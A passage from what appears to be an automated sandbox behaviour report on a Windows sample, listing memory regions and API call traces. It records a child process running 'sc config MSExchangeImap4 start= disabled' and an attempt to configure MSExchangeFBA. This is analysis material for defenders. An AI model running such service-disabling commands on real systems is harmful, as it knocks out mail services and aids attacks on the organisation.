"\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7281 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7282 start_va = 0x660000 end_va = 0x75ffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 7283 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7284 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 7285 start_va = 0x340000 end_va = 0x343fff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 7286 start_va = 0x430000 end_va = 0x4edfff entry_point = 0x430000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7287 start_va = 0x4f0000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 7288 start_va = 0x530000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 7289 start_va = 0x8f0000 end_va = 0x8fffff entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 7290 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7291 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7292 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7293 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7294 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7295 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7296 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7297 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7298 start_va = 0x7f380000 end_va = 0x7f47ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f380000" filename = "" Region: id = 7299 start_va = 0x7f4a9000 end_va = 0x7f4abfff entry_point = 0x0 region_type = private name = "private_0x000000007f4a9000" filename = "" Region: id = 7300 start_va = 0x760000 end_va = 0x83efff entry_point = 0x760000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 7301 start_va = 0x590000 end_va = 0x5a1fff entry_point = 0x590000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 458 os_tid = 0x954 [0130.270] GetModuleHandleA (lpModuleName=0x0) returned 0xe80000 [0130.270] __set_app_type (_Type=0x1) [0130.270] __p__fmode () returned 0x77ac4d6c [0130.270] __p__commode () returned 0x77ac5b1c [0130.271] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe85e00) returned 0x0 [0130.271] __wgetmainargs (in: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030, _DoWildCard=0, _StartInfo=0xe8d03c | out: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030) returned 0 [0130.271] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.273] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0130.273] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0130.273] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0130.273] _wcsicmp (_String1="config", _String2="query") returned -14 [0130.273] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0130.273] _wcsicmp (_String1="config", _String2="start") returned -16 [0130.273] _wcsicmp (_String1="config", _String2="pause") returned -13 [0130.273] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0130.273] _wcsicmp (_String1="config", _String2="control") returned -14 [0130.273] _wcsicmp (_String1="config", _String2="continue") returned -14 [0130.273] _wcsicmp (_String1="config", _String2="stop") returned -16 [0130.273] _wcsicmp (_String1="config", _String2="config") returned 0 [0130.273] ResolveDelayLoadedAPI () returned 0x77262c10 [0130.273] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x668808 [0130.275] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0130.275] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0130.275] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0130.275] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0130.275] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0130.275] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0130.275] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0130.275] OpenServiceW (hSCManager=0x668808, lpServiceName="MSExchangeFBA", dwDesiredAccess=0x3) returned 0x0 [0130.275] GetLastError () returned 0x424 [0130.275] _ultow (in: _Dest=0x424, _Radix=4192692 | out: _Dest=0x424) returned="1060" [0130.275] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xe8d3a0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0130.276] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x3ff990, nSize=0x2, Arguments=0x3ff9a8 | out: lpBuffer="裠f類?蔔è") returned 0x62 [0130.277] GetFileType (hFile=0x3c) returned 0x2 [0130.277] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ff974 | out: lpMode=0x3ff974) returned 1 [0130.277] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x6688e0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x3ff984, lpReserved=0x0 | out: lpBuffer=0x6688e0*, lpNumberOfCharsWritten=0x3ff984*=0x62) returned 1 [0130.277] LocalFree (hMem=0x6688e0) returned 0x0 [0130.277] LocalFree (hMem=0x0) returned 0x0 [0130.277] CloseServiceHandle (hSCObject=0x668808) returned 1 [0130.278] LocalFree (hMem=0x0) returned 0x0 [0130.278] exit (_Code=1060) Thread: id = 459 os_tid = 0x8c8 Process: id = "131" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x26e8c000" os_pid = "0xa58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c sc config MSExchangeImap4 start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7302 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 7303 start_va = 0xce0000 end_va = 0x4cdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 7304 start_va = 0x4ce0000 end_va = 0x4cfffff entry_point = 0x0 region_type = private name = "private_0x0000000004ce0000" filename = "" Region: id = 7305 start_va = 0x4d00000 end_va = 0x4d00fff entry_point = 0x0 region_type = private name = "private_0x0000000004d00000" filename = "" Region: id = 7306 start_va = 0x4d10000 end_va = 0x4d23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d10000" filename = "" Region: id = 7307 start_va = 0x4d30000 end_va = 0x4d6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d30000" filename = "" Region: id = 7308 start_va = 0x4d70000 end_va = 0x4e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d70000" filename = "" Region: id = 7309 start_va = 0x4e70000 end_va = 0x4e73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e70000" filename = "" Region: id = 7310 start_va = 0x4e80000 end_va = 0x4e80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e80000" filename = "" Region: id = 7311 start_va = 0x4e90000 end_va = 0x4e91fff entry_point = 0x0 region_type = private name = "private_0x0000000004e90000" filename = "" Region: id = 7312 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7313 start_va = 0x7ee80000 end_va = 0x7eea2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee80000" filename = "" Region: id = 7314 start_va = 0x7eeab000 end_va = 0x7eeadfff entry_point = 0x0 region_type = private name = "private_0x000000007eeab000" filename = "" Region: id = 7315 start_va = 0x7eeae000 end_va = 0x7eeaefff entry_point = 0x0 region_type = private name = "private_0x000000007eeae000" filename = "" Region: id = 7316 start_va = 0x7eeaf000 end_va = 0x7eeaffff entry_point = 0x0 region_type = private name = "private_0x000000007eeaf000" filename = "" Region: id = 7317 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7318 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7319 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 7320 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7321 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 7322 start_va = 0x4f00000 end_va = 0x4f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 7323 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7324 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7325 start_va = 0x50b0000 end_va = 0x51affff entry_point = 0x0 region_type = private name = "private_0x00000000050b0000" filename = "" Region: id = 7326 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7367 start_va = 0x4ce0000 end_va = 0x4ceffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ce0000" filename = "" Region: id = 7368 start_va = 0x4d00000 end_va = 0x4d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d00000" filename = "" Region: id = 7369 start_va = 0x4ea0000 end_va = 0x4edffff entry_point = 0x0 region_type = private name = "private_0x0000000004ea0000" filename = "" Region: id = 7370 start_va = 0x4f10000 end_va = 0x4fcdfff entry_point = 0x4f10000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7371 start_va = 0x51b0000 end_va = 0x52affff entry_point = 0x0 region_type = private name = "private_0x00000000051b0000" filename = "" Region: id = 7372 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7373 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7374 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7375 start_va = 0x7ed80000 end_va = 0x7ee7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed80000" filename = "" Region: id = 7376 start_va = 0x7eea8000 end_va = 0x7eeaafff entry_point = 0x0 region_type = private name = "private_0x000000007eea8000" filename = "" Region: id = 7377 start_va = 0x4cf0000 end_va = 0x4cf3fff entry_point = 0x0 region_type = private name = "private_0x0000000004cf0000" filename = "" Region: id = 7378 start_va = 0x4ee0000 end_va = 0x4ee3fff entry_point = 0x0 region_type = private name = "private_0x0000000004ee0000" filename = "" Region: id = 7379 start_va = 0x52b0000 end_va = 0x55e6fff entry_point = 0x52b0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 460 os_tid = 0xa54 [0130.470] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0130.470] __set_app_type (_Type=0x1) [0130.470] __p__fmode () returned 0x77ac4d6c [0130.470] __p__commode () returned 0x77ac5b1c [0130.470] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0130.471] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0130.471] GetCurrentThreadId () returned 0xa54 [0130.471] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa54) returned 0x84 [0130.471] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0130.471] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0130.471] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.473] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0130.473] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4e6fabc | out: phkResult=0x4e6fabc*=0x0) returned 0x2 [0130.473] VirtualQuery (in: lpAddress=0x4e6fac3, lpBuffer=0x4e6fa74, dwLength=0x1c | out: lpBuffer=0x4e6fa74*(BaseAddress=0x4e6f000, AllocationBase=0x4d70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.473] VirtualQuery (in: lpAddress=0x4d70000, lpBuffer=0x4e6fa74, dwLength=0x1c | out: lpBuffer=0x4e6fa74*(BaseAddress=0x4d70000, AllocationBase=0x4d70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0130.473] VirtualQuery (in: lpAddress=0x4d71000, lpBuffer=0x4e6fa74, dwLength=0x1c | out: lpBuffer=0x4e6fa74*(BaseAddress=0x4d71000, AllocationBase=0x4d70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0130.473] VirtualQuery (in: lpAddress=0x4d73000, lpBuffer=0x4e6fa74, dwLength=0x1c | out: lpBuffer=0x4e6fa74*(BaseAddress=0x4d73000, AllocationBase=0x4d70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.473] VirtualQuery (in: lpAddress=0x4e70000, lpBuffer=0x4e6fa74, dwLength=0x1c | out: lpBuffer=0x4e6fa74*(BaseAddress=0x4e70000, AllocationBase=0x4e70000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0130.473] GetConsoleOutputCP () returned 0x1b5 [0130.473] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0130.474] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0130.474] _get_osfhandle (_FileHandle=1) returned 0x3c [0130.474] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0130.474] _get_osfhandle (_FileHandle=1) returned 0x3c [0130.474] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0130.474] _get_osfhandle (_FileHandle=1) returned 0x3c [0130.474] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0130.474] _get_osfhandle (_FileHandle=0) returned 0x38 [0130.474] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0130.474] _get_osfhandle (_FileHandle=0) returned 0x38 [0130.474] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0130.475] GetEnvironmentStringsW () returned 0x50b7d98* [0130.475] FreeEnvironmentStringsA (penv="A") returned 1 [0130.475] GetEnvironmentStringsW () returned 0x50b7d98* [0130.475] FreeEnvironmentStringsA (penv="A") returned 1 [0130.475] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4e6ea20 | out: phkResult=0x4e6ea20*=0x94) returned 0x0 [0130.475] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4e6ea24, lpData=0x4e6ea2c, lpcbData=0x4e6ea28*=0x1000 | out: lpType=0x4e6ea24*=0x0, lpData=0x4e6ea2c*=0x68, lpcbData=0x4e6ea28*=0x1000) returned 0x2 [0130.475] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4e6ea24, lpData=0x4e6ea2c, lpcbData=0x4e6ea28*=0x1000 | out: lpType=0x4e6ea24*=0x4, lpData=0x4e6ea2c*=0x1, lpcbData=0x4e6ea28*=0x4) returned 0x0 [0130.475] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4e6ea24, lpData=0x4e6ea2c, lpcbData=0x4e6ea28*=0x1000 | out: lpType=0x4e6ea24*=0x0, lpData=0x4e6ea2c*=0x1, lpcbData=0x4e6ea28*=0x1000) returned 0x2 [0130.475] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4e6ea24, lpData=0x4e6ea2c, lpcbData=0x4e6ea28*=0x1000 | out: lpType=0x4e6ea24*=0x4, lpData=0x4e6ea2c*=0x0, lpcbData=0x4e6ea28*=0x4) returned 0x0 [0130.475] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4e6ea24, lpData=0x4e6ea2c, lpcbData=0x4e6ea28*=0x1000 | out: lpType=0x4e6ea24*=0x4, lpData=0x4e6ea2c*=0x40, lpcbData=0x4e6ea28*=0x4) returned 0x0 [0130.475] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4e6ea24, lpData=0x4e6ea2c, lpcbData=0x4e6ea28*=0x1000 | out: lpType=0x4e6ea24*=0x4, lpData=0x4e6ea2c*=0x40, lpcbData=0x4e6ea28*=0x4) returned 0x0 [0130.475] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4e6ea24, lpData=0x4e6ea2c, lpcbData=0x4e6ea28*=0x1000 | out: lpType=0x4e6ea24*=0x0, lpData=0x4e6ea2c*=0x40, lpcbData=0x4e6ea28*=0x1000) returned 0x2 [0130.475] RegCloseKey (hKey=0x94) returned 0x0 [0130.475] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4e6ea20 | out: phkResult=0x4e6ea20*=0x94) returned 0x0 [0130.475] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4e6ea24, lpData=0x4e6ea2c, lpcbData=0x4e6ea28*=0x1000 | out: lpType=0x4e6ea24*=0x0, lpData=0x4e6ea2c*=0x40, lpcbData=0x4e6ea28*=0x1000) returned 0x2 [0130.475] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4e6ea24, lpData=0x4e6ea2c, lpcbData=0x4e6ea28*=0x1000 | out: lpType=0x4e6ea24*=0x4, lpData=0x4e6ea2c*=0x1, lpcbData=0x4e6ea28*=0x4) returned 0x0 [0130.475] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4e6ea24, lpData=0x4e6ea2c, lpcbData=0x4e6ea28*=0x1000 | out: lpType=0x4e6ea24*=0x0, lpData=0x4e6ea2c*=0x1, lpcbData=0x4e6ea28*=0x1000) returned 0x2 [0130.475] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4e6ea24, lpData=0x4e6ea2c, lpcbData=0x4e6ea28*=0x1000 | out: lpType=0x4e6ea24*=0x4, lpData=0x4e6ea2c*=0x0, lpcbData=0x4e6ea28*=0x4) returned 0x0 [0130.475] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4e6ea24, lpData=0x4e6ea2c, lpcbData=0x4e6ea28*=0x1000 | out: lpType=0x4e6ea24*=0x4, lpData=0x4e6ea2c*=0x9, lpcbData=0x4e6ea28*=0x4) returned 0x0 [0130.475] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4e6ea24, lpData=0x4e6ea2c, lpcbData=0x4e6ea28*=0x1000 | out: lpType=0x4e6ea24*=0x4, lpData=0x4e6ea2c*=0x9, lpcbData=0x4e6ea28*=0x4) returned 0x0 [0130.475] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4e6ea24, lpData=0x4e6ea2c, lpcbData=0x4e6ea28*=0x1000 | out: lpType=0x4e6ea24*=0x0, lpData=0x4e6ea2c*=0x9, lpcbData=0x4e6ea28*=0x1000) returned 0x2 [0130.475] RegCloseKey (hKey=0x94) returned 0x0 [0130.475] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29833 [0130.475] srand (_Seed=0x5ad29833) [0130.475] GetCommandLineW () returned="/c sc config MSExchangeImap4 start= disabled" [0130.476] GetCommandLineW () returned="/c sc config MSExchangeImap4 start= disabled" [0130.476] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0130.476] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x50b9cf0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0130.476] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0130.476] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0130.476] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0130.476] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0130.476] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0130.476] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0130.476] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0130.476] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0130.476] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0130.476] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0130.476] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0130.476] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0130.476] GetEnvironmentStringsW () returned 0x50b7d98* [0130.476] FreeEnvironmentStringsA (penv="A") returned 1 [0130.476] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.476] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0130.476] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0130.476] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0130.476] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0130.476] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0130.476] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0130.476] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0130.476] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0130.476] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0130.477] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4e6f7f8 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0130.477] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4e6f7f8, lpFilePart=0x4e6f7f0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4e6f7f0*="Desktop") returned 0x1d [0130.477] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0130.477] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4e6f578 | out: lpFindFileData=0x4e6f578) returned 0x50b05c8 [0130.477] FindClose (in: hFindFile=0x50b05c8 | out: hFindFile=0x50b05c8) returned 1 [0130.477] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4e6f578 | out: lpFindFileData=0x4e6f578) returned 0x50b05c8 [0130.477] FindClose (in: hFindFile=0x50b05c8 | out: hFindFile=0x50b05c8) returned 1 [0130.477] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0130.477] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4e6f578 | out: lpFindFileData=0x4e6f578) returned 0x50b05c8 [0130.477] 